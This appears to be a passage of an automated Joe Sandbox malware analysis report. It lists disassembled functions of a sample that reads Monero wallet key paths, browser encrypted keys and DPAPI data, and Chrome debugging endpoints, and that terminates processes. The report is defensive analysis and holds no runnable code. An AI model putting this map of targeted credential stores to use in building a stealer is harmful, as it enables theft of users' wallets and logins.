Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$CopyDeletelstrcatlstrlenmemset
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_p$wallet_path
API String ID: 828395603-932603126
Opcode ID: 30b6d828dc5db3638bc25061e76f592fc5e068d0f52749ab509f5440504ce201
Instruction ID: 4dde3ccee4fbd1d333b05f68180df663e1f9c0e41752a6095c3039ca6c7bdac9
Opcode Fuzzy Hash: 30b6d828dc5db3638bc25061e76f592fc5e068d0f52749ab509f5440504ce201
Instruction Fuzzy Hash: 15912BB5D006489BDF05EFA1CC42AEE7779AF45308F04912EF405671A2DB786A85CB98

Function 00409638 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 144
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
InternetCloseHandle.WININET(00000000), ref: 00409746
InternetCloseHandle.WININET(19d), ref: 00409750

Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417

Strings

"webSocketDebuggerUrl":, xrefs: 00409766, 0040978A
"ws://, xrefs: 004097D5
19d, xrefs: 0040974C

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandleRead$memcpy
String ID: "webSocketDebuggerUrl":$"ws://$19d
API String ID: 1306965030-1558842042
Opcode ID: 7445a687bfbefb0145415f50722c0bd67ce230f59d10555b825b6c8669fb3561
Instruction ID: 7da362284cd13523119220d227888eaded019d737fe5024c9539090ef5163025
Opcode Fuzzy Hash: 7445a687bfbefb0145415f50722c0bd67ce230f59d10555b825b6c8669fb3561
Instruction Fuzzy Hash: C5511574109390AAE321AF35D80576B7FE6AF92308F04251DF4C5573E2EBF98A88C756

Function 0080003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0080024D

Strings

cess, xrefs: 0080018D
kernel32.dll, xrefs: 0080008F, 00800095

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1bd837da1d930fc6a51c34cd5e4ac5343de978b4e30de5ad6c8b9e2a38050176
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 32526B74A01229DFDBA4CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE85DF15

Function 00415342 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
Process32First.KERNEL32(00000000,?), ref: 00415362
Process32Next.KERNEL32(00000000,?), ref: 0041536E
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
CloseHandle.KERNEL32(00000000), ref: 004153A8
Process32Next.KERNEL32(00000000,?), ref: 004153B0
CloseHandle.KERNEL32(00000000), ref: 004153BB

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
Instruction ID: 1367e15fed5f08099624327341a9f6b83cbc5b8f1d39b42116c2796aecc681f2
Opcode Fuzzy Hash: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
Instruction Fuzzy Hash: E4018875201A09AFE3201B60AC8AFFB76ADFF86782F141025F915D6290DFB88C918665

Function 0040AE6D Relevance: 9.1, APIs: 6, Instructions: 75filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0040AEA5
GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
CloseHandle.KERNEL32(00000000), ref: 0040AF1F

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: b98cbdf50d7e701a5be6d0f0972cbf4a774099c09408808f8050ae90e96a3dbc
Instruction ID: 1266aaa71881ae481f911ec71e24bbf914394a3ed24a1c6c96427cdecb61913f
Opcode Fuzzy Hash: b98cbdf50d7e701a5be6d0f0972cbf4a774099c09408808f8050ae90e96a3dbc
Instruction Fuzzy Hash: 6B219CB52007019FC720DF65C845A6AB7F6FFC9310F00892AF996872A0DB74E851CB56

Function 0040B14B Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F

Part of subcall function 00414B34: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F

lstrlenA.KERNEL32(00000000,00000000,?,?,-00000010,00643AC3,?,?,?,?), ref: 0040B2A4

Strings

DPAP, xrefs: 0040B220
, xrefs: 0040B280
_key.txt, xrefs: 0040B2D1, 0040B2E9
"encrypted_key":", xrefs: 0040B1B2, 0040B1C9

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpylstrlen
String ID: $"encrypted_key":"$DPAP$_key.txt
API String ID: 82890309-3678897400
Opcode ID: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
Instruction ID: 200056ac7e48790ee9f9f958e2c71caa17006c645cadd2adf35f82bbd2b34129
Opcode Fuzzy Hash: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
Instruction Fuzzy Hash: 0F5127719403599BDB10DFB5DC49AEE77B6FF05308F08016EE890A7291D7389984CBD9

Function 00406BAE Relevance: 7.6, APIs: 5, Instructions: 68stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
Instruction ID: 9d1ca6733fe292c31276a17a668bcecf696b10a7d1d66101ed332df4bee839c5
Opcode Fuzzy Hash: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
Instruction Fuzzy Hash: 9D11E1F2A002549FD700EF25AC417993BE5AB95315F19403EF809D7341E779DA428BA6

Function 00406BE0 Relevance: 7.6, APIs: 5, Instructions: 54stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
Instruction ID: 80d2045ad2f8593c330baddbf277162730afe79b108fe80333406e261d85fc85
Opcode Fuzzy Hash: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
Instruction Fuzzy Hash: 1D01A5F1A002489FD700EF25EC41BAE77E8EB99709F11402EF809D7341D774DA058B66

Function 00401458 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00401475
HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00401484
RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 00401493
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 004014AD
RegCloseKey.ADVAPI32 ref: 004014B6

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
Instruction ID: 11042f845f27c60c9cfe49634e62bc90fad70a14fa62364d3bf2c67db5fe234b
Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
Instruction Fuzzy Hash: A0F04F75104254BFD310AB66EC4DD1BBFADFFC6B55F001429F98492160D6359C14DB71

Function 0041A90D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 0041A92E

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00407382: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
Part of subcall function 00407382: StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
Part of subcall function 00407382: InternetOpenA.WININET ref: 0040747C

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 0041A9F9

Strings

ERROR, xrefs: 0041A9F3

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$InternetOpen
String ID: ERROR
API String ID: 3860179324-2861137601
Opcode ID: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
Instruction ID: 280cb0089ae8515307c330337300684973a3070d8c525834bcac429b90799bd2
Opcode Fuzzy Hash: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
Instruction Fuzzy Hash: 593152B5D012099FCB01EF65C982ADEBBF5BF08314F00451AE815A7291DB34BA95CF95

Function 0041797D Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWaitlstrcpy
String ID:
API String ID: 309549813-0
Opcode ID: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
Instruction ID: ea3f199f5e230162cc47f9fcea8af2023e6e25e0fd3ef7ab80fb325c08834ad3
Opcode Fuzzy Hash: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
Instruction Fuzzy Hash: 634150B92143048FC705EF65D8869EE77EABF85345F00882EF855C3291DF389A48CBA5

Function 00413DBF Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB), ref: 00413DC2
HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE), ref: 00413DD1
GetComputerNameA.KERNEL32(00000000), ref: 00413DDF

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
